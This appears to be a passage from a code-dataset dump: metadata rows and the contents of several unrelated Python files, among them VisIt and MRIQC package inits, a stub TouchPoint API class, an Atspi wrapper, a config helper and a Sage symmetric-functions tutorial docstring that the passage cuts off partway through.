| 17.142857 | 42 | 0.733333 | 15 | 120 | 5.8 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009709 | 0.141667 | 120 | 6 | 43 | 20 | 0.834951 | 0 | 0 | 0 | 0 | 0 | 0.275 | 0.191667 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.2 | 0 | 0.2 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
8612a7432e2a2ecf2a7b2210ba9155777f131c66 | 473 | py | Python | src/visitpy/visit_utils/src/builtin/__init__.py | whophil/visit | 4fd83212e20db1177916110ba40eeec6f41f8435 | [
"BSD-3-Clause"
] | null | null | null | src/visitpy/visit_utils/src/builtin/__init__.py | whophil/visit | 4fd83212e20db1177916110ba40eeec6f41f8435 | [
"BSD-3-Clause"
] | null | null | null | src/visitpy/visit_utils/src/builtin/__init__.py | whophil/visit | 4fd83212e20db1177916110ba40eeec6f41f8435 | [
"BSD-3-Clause"
] | null | null | null | # Copyright (c) Lawrence Livermore National Security, LLC and other VisIt
# Project developers. See the top-level LICENSE file for dates and other
# details. No copyright assignment is required to contribute to VisIt.
"""
file: __init__.py
author: Cyrus Harrison <cyrush@llnl.gov>
created: 7/6/2020
description:
Init file for 'visit_utils.builtin' module.
"""
from .evalfuncs import *
from .writescript import WriteScript
from .convert2to3 import ConvertPy2to3 | 31.533333 | 73 | 0.769556 | 64 | 473 | 5.609375 | 0.765625 | 0.044568 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025063 | 0.156448 | 473 | 15 | 74 | 31.533333 | 0.874687 | 0.744186 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
862b954f750bb811af31e158371b5f4caeac3f34 | 340 | py | Python | jade2/rosetta_jade/flag_util.py | RosettaCommons/jade2 | 40affc7c4e0f1f6ee07030e72de284e3484946e7 | [
"BSD-3-Clause"
] | 1 | 2019-12-23T21:52:23.000Z | 2019-12-23T21:52:23.000Z | jade2/rosetta_jade/flag_util.py | RosettaCommons/jade2 | 40affc7c4e0f1f6ee07030e72de284e3484946e7 | [
"BSD-3-Clause"
] | null | null | null | jade2/rosetta_jade/flag_util.py | RosettaCommons/jade2 | 40affc7c4e0f1f6ee07030e72de284e3484946e7 | [
"BSD-3-Clause"
] | 2 | 2021-11-13T01:34:15.000Z | 2021-11-13T01:34:34.000Z | from jade2.basic.path import *
def get_common_flags_string_for_init(flags_name = "common_flags.flags"):
"""
Get a string of common flags as specified in the database.
:return: str
"""
return " ".join([ line.strip() for line in open(get_rosetta_flags_path()+'/'+flags_name, 'r') if line and not line.startswith('#')])
| 30.909091 | 136 | 0.685294 | 51 | 340 | 4.352941 | 0.627451 | 0.148649 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003571 | 0.176471 | 340 | 10 | 137 | 34 | 0.789286 | 0.208824 | 0 | 0 | 0 | 0 | 0.088353 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
86378030ffb7a008ace921889a0f6c81d8965897 | 1,565 | py | Python | future/touchpoint.py | alpinedatalabs/python-alpine-api | 2f74e4eeb7cb6d2b4f2d73db90e8c4afc552d1e7 | [
"MIT"
] | null | null | null | future/touchpoint.py | alpinedatalabs/python-alpine-api | 2f74e4eeb7cb6d2b4f2d73db90e8c4afc552d1e7 | [
"MIT"
] | 8 | 2017-03-07T01:23:22.000Z | 2019-10-24T22:45:46.000Z | future/touchpoint.py | alpinedatalabs/python-alpine-api | 2f74e4eeb7cb6d2b4f2d73db90e8c4afc552d1e7 | [
"MIT"
] | 3 | 2017-03-13T11:15:19.000Z | 2019-03-24T21:47:05.000Z | from api.exception import *
from api.alpineobject import AlpineObject
class TouchPoint(AlpineObject):
def __init__(self, base_url, session, token):
super(TouchPoint, self).__init__(base_url, session, token)
def add_touchpoint(self, touchpoint_name, workfile_id, workspace_id, touchpoint_description):
"""
Does nothing
:param touchpoint_name:
:param workfile_id:
:param workspace_id:
:param touchpoint_description:
:return:
"""
pass
def delete_touchpoint(self, touchpoint_name, workspace_id):
"""
Does nothing
:param touchpoint_name:
:param workspace_id:
:return:
"""
pass
def publish_touchpoint(self, workspace_id, touchpoint_name):
pass
def unpublish_touchpoint(self, workspace_id, touchpoint_name):
pass
def run_touchpoint(self, workspace_id, touchpoint_name, output_table, parameter_list=None):
pass
def stop_touchpoint(self, workspace_id, touchpoint_name):
pass
def get_touchpoint_list(self, workspace_id=None):
pass
def get_touchpoint_info(self, touchpoint_name):
pass
def get_touchpoint_id(self, touchpoint_name):
pass
def add_touchpoint_parameter(self, workspace_id, touchpoint_name, variable_name, data_type,
variable_label, variable_desc, options, required_val, use_default):
pass
def get_touchpoint_parameters(self, workspace_id, touchpoint_name):
pass
| 26.083333 | 97 | 0.668371 | 172 | 1,565 | 5.726744 | 0.284884 | 0.170558 | 0.149239 | 0.152284 | 0.390863 | 0.33198 | 0.140102 | 0.140102 | 0 | 0 | 0 | 0 | 0.259425 | 1,565 | 59 | 98 | 26.525424 | 0.849871 | 0.11885 | 0 | 0.392857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.428571 | false | 0.392857 | 0.071429 | 0 | 0.535714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 3 |
8639bc81e6a1d5c69c20797cee962de7e7df13c0 | 1,155 | py | Python | py2End/Components/container.py | FuhrerG/PythonAtspi-API | bde1f71cebaa270b6f540562b1896f5bd7ff17cb | [
"MIT"
] | null | null | null | py2End/Components/container.py | FuhrerG/PythonAtspi-API | bde1f71cebaa270b6f540562b1896f5bd7ff17cb | [
"MIT"
] | null | null | null | py2End/Components/container.py | FuhrerG/PythonAtspi-API | bde1f71cebaa270b6f540562b1896f5bd7ff17cb | [
"MIT"
] | null | null | null | from __future__ import annotations
from component import *
from typing import Dict, Any, List, Tuple
from utils import *
import gi
gi.require_version('Atspi', '2.0')
from gi.repository import Atspi
class Container(E2eComponent):
# Atributes
# Constructor
def __init__(self: Container, obj: Atspi.Object):
super().__init__(obj)
# Public Methods
def get_childrens(self: Container) -> List[E2eComponent]:
childrens = [self.component.get_child_at_index(i)
for i in range(self.component.get_child_count())]
return Utils.to_e2e_list(childrens)
def get_childrens_number(self: Container) -> int:
return len(self.get_childrens())
def get_descendants(self: Container) -> List[E2eComponent]:
childrens = []
for obj in Utils.tree_walk(self.component):
childrens.append(obj)
return Utils.to_e2e_list(childrens)
def get_descendants_number(self: Container) -> int:
return len(self.get_descendants())
def is_parent_of(self: Container, child: E2eComponent) -> bool:
return child.component.get_parent() == self.component
| 28.875 | 70 | 0.684848 | 142 | 1,155 | 5.330986 | 0.387324 | 0.103038 | 0.059445 | 0.076618 | 0.293263 | 0.192867 | 0.192867 | 0.192867 | 0 | 0 | 0 | 0.00882 | 0.214719 | 1,155 | 39 | 71 | 29.615385 | 0.825799 | 0.031169 | 0 | 0.08 | 0 | 0 | 0.007175 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.24 | false | 0 | 0.24 | 0.12 | 0.72 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
864de2366e0badfd5eaa5e2e35d4298c9984af96 | 386 | py | Python | mriqc/classifier/__init__.py | erramuzpe/mriqc | 03eb869b0966cf27fe85db88a970f8ab8640c9e9 | [
"BSD-3-Clause"
] | 1 | 2019-08-17T21:20:48.000Z | 2019-08-17T21:20:48.000Z | mriqc/classifier/__init__.py | erramuzpe/mriqc | 03eb869b0966cf27fe85db88a970f8ab8640c9e9 | [
"BSD-3-Clause"
] | null | null | null | mriqc/classifier/__init__.py | erramuzpe/mriqc | 03eb869b0966cf27fe85db88a970f8ab8640c9e9 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""
Using the classifier
--------------------
.. toctree::
:maxdepth: 3
cv/base
cv/data
cv/helper
Cross-validation in MRIQC
-------------------------
.. toctree::
:maxdepth: 3
cv/experiments
"""
| 14.846154 | 73 | 0.523316 | 50 | 386 | 4.04 | 0.74 | 0.148515 | 0.158416 | 0.178218 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022727 | 0.202073 | 386 | 25 | 74 | 15.44 | 0.633117 | 0.953368 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
8652e9b06d7a64b3de9ec8c032f891de24bf0135 | 869 | py | Python | fosslint/config.py | udoprog/fosslint | 85a9d9d85c747afeee3bbe693a6aa2a021b42b6f | [
"Apache-2.0"
] | 1 | 2016-09-30T13:52:01.000Z | 2016-09-30T13:52:01.000Z | fosslint/config.py | udoprog/fosslint | 85a9d9d85c747afeee3bbe693a6aa2a021b42b6f | [
"Apache-2.0"
] | 3 | 2016-09-29T22:10:45.000Z | 2016-09-30T14:03:10.000Z | fosslint/config.py | udoprog/fosslint | 85a9d9d85c747afeee3bbe693a6aa2a021b42b6f | [
"Apache-2.0"
] | null | null | null | import configparser
BOOLEAN_TRUE = set(['true'])
def unquote(string):
"""
Unqoute escape sequences in the given string.
TODO: implement this
"""
return string
class Config:
def __init__(self, config):
self.config = config
def sections(self):
return self.config.sections()
def __getitem__(self, section):
return Section(self.config[section])
class Section:
def __init__(self, section):
self.section = section
def get(self, key):
value = self.section.get(key)
if value is None:
return None
if value.startswith('"') and value.endswith('"'):
return unquote(value[1:-1])
return value
def getboolean(self, key):
value = self.get(key)
if value is None:
return None
return value in BOOLEAN_TRUE
| 19.311111 | 57 | 0.597238 | 102 | 869 | 4.95098 | 0.352941 | 0.079208 | 0.043564 | 0.063366 | 0.114851 | 0.114851 | 0.114851 | 0.114851 | 0 | 0 | 0 | 0.003306 | 0.303797 | 869 | 44 | 58 | 19.75 | 0.831405 | 0.075949 | 0 | 0.153846 | 0 | 0 | 0.007663 | 0 | 0 | 0 | 0 | 0.022727 | 0 | 1 | 0.269231 | false | 0 | 0.038462 | 0.076923 | 0.692308 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
867259bc377f0dc64ef6ea3a154fe7023103a89d | 51,739 | py | Python | src/sage/combinat/sf/sf.py | drvinceknight/sage | 00199fb220aa173d8585b9e90654dafd3247d82d | [
"BSL-1.0"
] | 2 | 2015-08-11T05:05:47.000Z | 2019-05-15T17:27:25.000Z | src/sage/combinat/sf/sf.py | kaushik94/sage | 00199fb220aa173d8585b9e90654dafd3247d82d | [
"BSL-1.0"
] | null | null | null | src/sage/combinat/sf/sf.py | kaushik94/sage | 00199fb220aa173d8585b9e90654dafd3247d82d | [
"BSL-1.0"
] | 1 | 2020-07-24T12:04:03.000Z | 2020-07-24T12:04:03.000Z | """
Symmetric functions, with their multiple realizations
"""
#*****************************************************************************
# Copyright (C) 2007 Mike Hansen <mhansen@gmail.com>
# 2009-2012 Jason Bandlow <jbandlow@gmail.com>
# 2012 Anne Schilling <anne at math.ucdavis.edu>
# 2009-2012 Nicolas M. Thiery <nthiery at users.sf.net>
# 2012 Mike Zabrocki <mike.zabrocki@gmail.com>
#
# Distributed under the terms of the GNU General Public License (GPL)
#
# This code is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# The full text of the GPL is available at:
#
# http://www.gnu.org/licenses/
#*****************************************************************************
from sage.structure.parent import Parent
from sage.structure.unique_representation import UniqueRepresentation
from sage.categories.all import Rings, GradedHopfAlgebras
from sage.combinat.partition import Partitions
from sage.combinat.free_module import CombinatorialFreeModule
from sage.rings.rational_field import QQ
import schur
import monomial
import powersum
import elementary
import homogeneous
import hall_littlewood
import jack
import macdonald
import llt
class SymmetricFunctions(UniqueRepresentation, Parent):
r"""
The abstract algebra of commutative symmetric functions
.. rubric:: Symmetric Functions in Sage
.. MODULEAUTHOR:: Jason Bandlow, Anne Schilling, Nicolas M. Thiery, Mike Zabrocki
This document is an introduction to working with symmetric function
theory in Sage.
It is not intended to be an introduction to the theory
of symmetric functions ([MAC]_ and [STA]_, Chapter 7, are two excellent
references.) The reader is also expected to be familiar with Sage.
.. rubric:: The algebra of symmetric functions
The algebra of symmetric functions is the unique free commutative graded
connected algebra over the given ring, with one generator in each degree. It
can also be thought of as the inverse limit (in the category of graded
algebras) of the algebra of symmetric polynomials in `n` variables as `n \rightarrow \infty`.
Sage allows us to construct the algebra of symmetric functions over
any ring. We will use a base ring of rational numbers in these first
examples::
sage: Sym = SymmetricFunctions(QQ)
sage: Sym
Symmetric Functions over Rational Field
Sage knows certain categorical information about this algebra::
sage: Sym.category()
Join of Category of hopf algebras over Rational Field
and Category of graded algebras over Rational Field
and Category of monoids with realizations
and Category of coalgebras over Rational Field with realizations
Notice that ``Sym`` is an *abstract* algebra. This reflects the fact that
there are multiple natural bases. To work with specific
elements, we need a *realization* of this algebra. In practice, this
means we need to specify a basis.
.. rubric:: An example basis - power sums
Here is an example of how one might use the power sum realization::
sage: p = Sym.powersum()
sage: p
Symmetric Functions over Rational Field in the powersum basis
``p`` now represents the realization of the symmetric function algebra on
the power sum basis. The basis itself is accessible through::
sage: p.basis()
Lazy family (Term map from Partitions to Symmetric Functions over Rational Field in the powersum basis(i))_{i in Partitions}
sage: p.basis().keys()
Partitions
This last line means that ``p.basis()`` is an association between the set
of Partitions and the basis elements of the algebra ``p``. To construct a
specific element one can therefore do::
sage: p.basis()[Partition([2,1,1])]
p[2, 1, 1]
As this is rather cumbersome, realizations of the symmetric function
algebra allow for the following abuses of notation::
sage: p[Partition([2, 1, 1])]
p[2, 1, 1]
sage: p[[2, 1, 1]]
p[2, 1, 1]
sage: p[2, 1, 1]
p[2, 1, 1]
or even::
sage: p[(i for i in [2, 1, 1])]
p[2, 1, 1]
In the special case of the empty partition, due to a limitation in
Python syntax, one cannot use::
sage: p[] # todo: not implemented
Please use instead::
sage: p[[]]
p[]
.. note:: When elements are constructed using the ``p[something ]`` syntax ,
an error will be raised if the input cannot be interpreted as a partition.
This is *not* the case when ``p.basis()`` is used::
sage: p['something']
Traceback (most recent call last):
...
ValueError: ['s', 'o', 'm', 'e', 't', 'h', 'i', 'n', 'g'] is not an element of Partitions
sage: p.basis()['something']
p'something'
Elements of ``p`` are linear combinations of such compositions::
sage: p.an_element()
2*p[] + 2*p[1] + 3*p[2]
.. rubric:: Algebra structure
Algebraic combinations of basis elements can be entered in a natural way::
sage: p[2,1,1] + 2 * p[1] * (p[4] + p[2,1])
3*p[2, 1, 1] + 2*p[4, 1]
Let us explore the other operations of ``p``. We can ask for
the mathematical properties of ``p``::
sage: p.categories()
[Category of bases of Symmetric Functions over Rational Field, Category of graded hopf algebras with basis over Rational Field, ...]
To start with, ``p`` is a graded algebra, the grading being induced
by the size of the partitions. Due to this, the one is the basis
element indexed by the empty partition::
sage: p.one()
p[]
The ``p`` basis is multiplicative; that is, multiplication is induced by
linearity from the (nonincreasingly sorted) concatenation of partitions::
sage: p[3,1] * p[2,1]
p[3, 2, 1, 1]
sage: (p.one() + 2 * p[3,1]) * p[4, 2]
p[4, 2] + 2*p[4, 3, 2, 1]
.. rubric:: The classical bases
In addition to the power sum basis, the other classical bases of the
symmetric function algebra are the elementary, complete homogeneous,
monomial, and Schur bases. These can be defined as follows::
sage: e = Sym.elementary()
sage: h = Sym.homogeneous()
sage: m = Sym.monomial()
sage: s = Sym.schur()
These can be defined all at once with the single command
::
sage: Sym.inject_shorthands()
doctest:...: RuntimeWarning: redefining global value `h`
doctest:...: RuntimeWarning: redefining global value `s`
doctest:...: RuntimeWarning: redefining global value `e`
doctest:...: RuntimeWarning: redefining global value `m`
doctest:...: RuntimeWarning: redefining global value `p`
We can then do conversions from one basis to another::
sage: s(p[2,1])
-s[1, 1, 1] + s[3]
sage: m(p[3])
m[3]
sage: m(p[3,2])
m[3, 2] + m[5]
For computations which mix bases, Sage will return a result with respect
to a single (not necessarily predictable) basis::
sage: p[2] * s[2] - m[4]
1/2*p[2, 1, 1] + 1/2*p[2, 2] - p[4]
sage: p( m[1] * ( e[3]*s[2] + 1 ))
p[1] + 1/12*p[1, 1, 1, 1, 1, 1] - 1/6*p[2, 1, 1, 1, 1] - 1/4*p[2, 2, 1, 1] + 1/6*p[3, 1, 1, 1] + 1/6*p[3, 2, 1]
The one for different bases such as the power sum and Schur function is the same::
sage: s.one() == p.one()
True
.. rubric:: Basic computations
In this section, we explore some of the many methods that can be applied
to an arbitrary symmetric function::
sage: f = s[2]^2; f
s[2, 2] + s[3, 1] + s[4]
For more methods than discussed here, create a symmetric function as
above, and use ``f.<tab>``.
.. _`Representation theory of the symmetric group`:
.. rubric:: Representation theory of the symmetric group
The Schur functions `s_\lambda` can also be interpreted as irreducible characters of the symmetric
group `S_n`, where `n` is the size of the partition `\lambda`. Since the Schur functions of
degree `n` form a basis of the symmetric functions of degree `n`, it
follows that an arbitrary symmetric function (homogeneous of degree
`n`) may be interpreted as a function on the symmetric group. In this
interpretation the power sum symmetric function `p_\lambda` is the characteristic
function of the conjugacy class with shape `\lambda`, multiplied by the order of
the centralizer of an element. Hence the irreducible characters can be computed
as follows::
sage: Sym = SymmetricFunctions(QQ)
sage: s = Sym.schur()
sage: p = Sym.power()
sage: P = Partitions(5).list()
sage: P = [P[i] for i in range(len(P)-1,-1,-1)]
sage: M = matrix([[s[P[i]].scalar(p[P[j]]) for j in range(len(P))] for i in range(len(P))])
sage: M
[ 1 -1 1 1 -1 -1 1]
[ 4 -2 0 1 1 0 -1]
[ 5 -1 1 -1 -1 1 0]
[ 6 0 -2 0 0 0 1]
[ 5 1 1 -1 1 -1 0]
[ 4 2 0 1 -1 0 -1]
[ 1 1 1 1 1 1 1]
We can indeed check that this agrees with the character table of `S_5`::
sage: SymmetricGroup(5).character_table() == M
True
In this interpretation of symmetric functions as characters on the
symmetric group, the multiplication and comultiplication are
interpreted as induction (from `S_n\times S_m` to `S_{n+m}`)
and restriction, respectively. The Schur functions can also be interpreted
as characters of `GL_n`, see `Partitions and Schur functions`__.
__ ../../../../thematic_tutorials/lie/lie_basics.html#partitions-and-schur-polynomials
.. rubric:: The omega involution
The `\omega` involution is the linear extension of the map which sends
`e_\lambda` to `h_{\lambda}`::
sage: h(f)
h[2, 2]
sage: e(f.omega())
e[2, 2]
.. rubric:: The Hall scalar product
The Hall scalar product on the algebra of symmetric functions makes the
Schur functions into an orthonormal basis::
sage: f.scalar(f)
3
.. rubric:: Skewing
*Skewing* is the adjoint operation to multiplication with respect to
this scalar product::
sage: f.skew_by(s[1])
2*s[2, 1] + 2*s[3]
In general, ``s[la].skew_by(s[mu])`` is the symmetric function typically
denoted `s_{\lambda \setminus \mu}` or `s_{\lambda / \mu}`.
.. rubric:: Expanding into variables
We can expand a symmetric function into a symmetric polynomial in a
specified number of variables::
sage: f.expand(2)
x0^4 + 2*x0^3*x1 + 3*x0^2*x1^2 + 2*x0*x1^3 + x1^4
See the documentation for ``expand`` for more examples.
.. rubric:: The Kronecker product
As in the section on the `Representation theory of
the symmetric group`_, a symmetric function may be considered as a
class function on the symmetric group where the elements
`p_\mu/z_\mu` are the indicators of a permutation having
cycle structure `\mu`. The Kronecker product of two
symmetric functions corresponds to the pointwise product
of these class functions.
Since the Schur functions are the irreducible characters
of the symmetric group under this identification, the Kronecker
product of two Schur functions corresponds to the internal
tensor product of two irreducible symmetric group representations.
Under this identification, the Kronecker
product of `p_\mu/z_\mu` and `p_\nu/z_\nu` is `p_\mu/z_\mu`
if `\mu=\nu`, and the result is equal to `0` otherwise.
``internal_product``, ``kronecker_product``, ``inner_tensor`` and
``itensor`` are different names for the same function.
::
sage: f.kronecker_product(f)
s[1, 1, 1, 1] + 3*s[2, 1, 1] + 4*s[2, 2] + 5*s[3, 1] + 3*s[4]
.. rubric:: Plethysm
The *plethysm* of symmetric functions is the operation corresponding to
composition of representations of the general linear group. See [STA]_
Chapter 7, Appendix 2 for details.
::
sage: s[2].plethysm(s[2])
s[2, 2] + s[4]
Plethysm can also be written as a composition of functions::
sage: s[2]( s[2] )
s[2, 2] + s[4]
If the coefficient ring contains degree 1 elements, these are handled
properly by plethysm::
sage: R.<t> = QQ[]; s = SymmetricFunctions(R).schur()
sage: s[2]( (1-t)*s[1] )
(t^2-t)*s[1, 1] + (-t+1)*s[2]
See the documentation for ``plethysm`` for more information.
.. rubric:: Inner plethysm
The operation of inner plethysm ``f.inner_plethysm(g)`` models the
composition of the `S_n` representation represented by `g` with the
`GL_m` representation whose character is `f`. See the documentation of
``inner_plethysm``, [ST94]_ or [STA]_, exercise 7.74 solutions for more
information::
sage: s = SymmetricFunctions(QQ).schur()
sage: f = s[2]^2
sage: f.inner_plethysm(s[2])
s[2]
.. rubric:: Hopf algebra structure
The ring of symmetric functions is further endowed with a coalgebra
structure. The coproduct is an algebra morphism, and therefore
determined by its values on the generators; the power sum generators
are primitive::
sage: p[1].coproduct()
p[] # p[1] + p[1] # p[]
sage: p[2].coproduct()
p[] # p[2] + p[2] # p[]
The coproduct, being cocommutative on the generators, is cocommutative everywhere::
sage: p[2, 1].coproduct()
p[] # p[2, 1] + p[1] # p[2] + p[2] # p[1] + p[2, 1] # p[]
This coproduct, along with the counit which sends every symmetric function
to its `0`-th homogeneous component, makes the ring of symmetric functions
into a graded connected bialgebra. It is known that every graded connected
bialgebra has an antipode. For the ring of symmetric functions, the antipode
can be characterized explicitly: The antipode is an anti-algebra morphism
(thus an algebra morphism, since our algebra is commutative) which sends
`p_{\lambda}` to `(-1)^{\mathrm{length}(\lambda)} p_{\lambda}` for every
partition `\lambda`. Thus, in particular, it sends the generators on the
``p`` basis to their opposites::
sage: p[3].antipode()
-p[3]
sage: p[3,2,1].antipode()
-p[3, 2, 1]
The graded connected bialgebra of symmetric functions over a `\QQ`-algebra
has a rather simply-understood structure: It is (isomorphic to) the
symmetric algebra of its space of primitives (which is spanned by the
power-sum symmetric functions).
Here are further examples::
sage: f = s[2]^2
sage: f.antipode()
s[1, 1, 1, 1] + s[2, 1, 1] + s[2, 2]
sage: f.coproduct()
s[] # s[2, 2] + s[] # s[3, 1] + s[] # s[4] + 2*s[1] # s[2, 1] + 2*s[1] # s[3] + s[1, 1] # s[1, 1]
+ s[1, 1] # s[2] + s[2] # s[1, 1] + 3*s[2] # s[2] + 2*s[2, 1] # s[1] + s[2, 2] # s[] + 2*s[3] # s[1]
+ s[3, 1] # s[] + s[4] # s[]
sage: f.coproduct().apply_multilinear_morphism( lambda x,y: x*y.antipode() )
0
.. rubric:: Transformations of symmetric functions
There are many methods in Sage which make it easy to manipulate symmetric
functions. For example, if we have some function which acts on partitions
(say, conjugation), it is a simple matter to apply it to the support of a
symmetric function. Here is an example::
sage: conj = lambda mu: mu.conjugate()
sage: f = h[4] + 2*h[3,1]
sage: f.map_support(conj)
h[1, 1, 1, 1] + 2*h[2, 1, 1]
We can also easily modify the coefficients::
sage: def foo(mu, coeff): return mu.conjugate(), -coeff
sage: f.map_item(foo)
-h[1, 1, 1, 1] - 2*h[2, 1, 1]
See also ``map_coefficients``.
There are also methods for building functions directly::
sage: s.sum_of_monomials(mu for mu in Partitions(3))
s[1, 1, 1] + s[2, 1] + s[3]
sage: s.sum_of_monomials(Partitions(3))
s[1, 1, 1] + s[2, 1] + s[3]
sage: s.sum_of_terms( (mu, mu[0]) for mu in Partitions(3))
s[1, 1, 1] + 2*s[2, 1] + 3*s[3]
These are the preferred way to build elements within a program;
the result will usually be faster than using :func:`sum`. It also
guarantees that empty sums yields the zero of ``s`` (see also
``s.sum``).
Note also that it is a good idea to use::
sage: s.one()
s[]
sage: s.zero()
0
instead of ``s(1)`` and ``s(0)`` within programs where speed is important,
in order to prevent unnecessary coercions.
.. rubric:: Different base rings
Depending on the base ring, the different realizations of the symmetric
function algebra may not span the same space::
sage: SZ = SymmetricFunctions(ZZ)
sage: p = SZ.power(); s = SZ.schur()
sage: p(s[1,1,1])
Traceback (most recent call last):
...
TypeError: no conversion of this rational to integer
Because of this, some functions may not behave as expected when working over
the integers, even though they make mathematical sense::
sage: s[1,1,1].plethysm(s[1,1,1])
Traceback (most recent call last):
...
TypeError: no conversion of this rational to integer
It is possible to work over different base rings simultaneously::
sage: s = SymmetricFunctions(QQ).schur()
sage: p = SymmetricFunctions(QQ).power()
sage: sz = SymmetricFunctions(ZZ).schur(); sz._prefix = 'sz'
sage: pz = SymmetricFunctions(ZZ).power(); pz._prefix = 'pz'
sage: p(sz[1,1,1])
1/6*p[1, 1, 1] - 1/2*p[2, 1] + 1/3*p[3]
sage: sz( 1/6*p[1, 1, 1] - 1/2*p[2, 1] + 1/3*p[3] )
sz[1, 1, 1]
As shown in this example, if you are working over multiple base rings
simultaneously, it is a good idea to change the prefix in some cases, so that
you can tell from the output which realization your result is in.
Let us change the notation back for the remainder of this tutorial::
sage: sz._prefix = 's'
sage: pz._prefix = 'p'
One can also use the Sage standard renaming idiom to get shorter outputs::
sage: Sym = SymmetricFunctions(QQ)
sage: Sym.rename("Sym")
sage: Sym
Sym
sage: Sym.rename()
And we name it back::
sage: Sym.rename("Symmetric Functions over Rational Field"); Sym
Symmetric Functions over Rational Field
.. rubric:: Other bases
There are two additional basis of the symmetric functions which are not
considered as classical bases:
* forgotten basis
* Witt basis
The forgotten basis is the dual basis of the elementary symmetric
functions basis with respect to the Hall scalar product. The Witt basis
can be constructed by
.. MATH::
\prod_{d=1}^{\infty} (1 - w_d t^d)^{-1} = \sum_{n=0}^{\infty} h_n t^n
where `t` is a formal variable.
There are further bases of the ring of symmetric functions, in general over
fields with parameters such as `q` and `t`:
* Hall-Littlewood bases
* Jack bases
* Macdonald bases
* `k`-Schur functions
We briefly demonstrate how to access these bases. For more information, see
the documentation of the individual bases.
The *Jack polynomials* can be obtained as::
sage: Sym = SymmetricFunctions(FractionField(QQ['t']))
sage: Jack = Sym.jack()
sage: P = Jack.P(); J = Jack.J(); Q = Jack.Q()
sage: J(P[2,1])
(1/(t+2))*JackJ[2, 1]
The parameter `t` can be specialized as follows::
sage: Sym = SymmetricFunctions(QQ)
sage: Jack = Sym.jack(t = 1)
sage: P = Jack.P(); J = Jack.J(); Q = Jack.Q()
sage: J(P[2,1])
1/3*JackJ[2, 1]
Similarly one can access the Hall-Littlewood and Macdonald polynomials, etc::
sage: Sym = SymmetricFunctions(FractionField(QQ['q','t']))
sage: Mcd = Sym.macdonald()
sage: P = Mcd.P(); J = Mcd.J(); Q = Mcd.Q()
sage: J(P[2,1])
(1/(-q*t^4+2*q*t^3-q*t^2+t^2-2*t+1))*McdJ[2, 1]
.. rubric:: `k`-Schur functions
The `k`-Schur functions live in the `k`-bounded subspace of the ring of
symmetric functions. It is possible to compute in the `k`-bounded subspace
directly::
sage: Sym = SymmetricFunctions(QQ)
sage: ks = Sym.kschur(3,1)
sage: f = ks[2,1]*ks[2,1]; f
ks3[2, 2, 1, 1] + ks3[2, 2, 2] + ks3[3, 1, 1, 1]
or to lift to the ring of symmetric functions::
sage: f.lift()
s[2, 2, 1, 1] + s[2, 2, 2] + s[3, 1, 1, 1] + 2*s[3, 2, 1] + s[3, 3] + s[4, 1, 1] + s[4, 2]
However, it is not always possible to convert a symmetric function to the `k`-bounded subspace::
sage: s = Sym.schur()
sage: ks(s[2,1,1])
Traceback (most recent call last):
...
ValueError: s[2, 1, 1] is not in the image
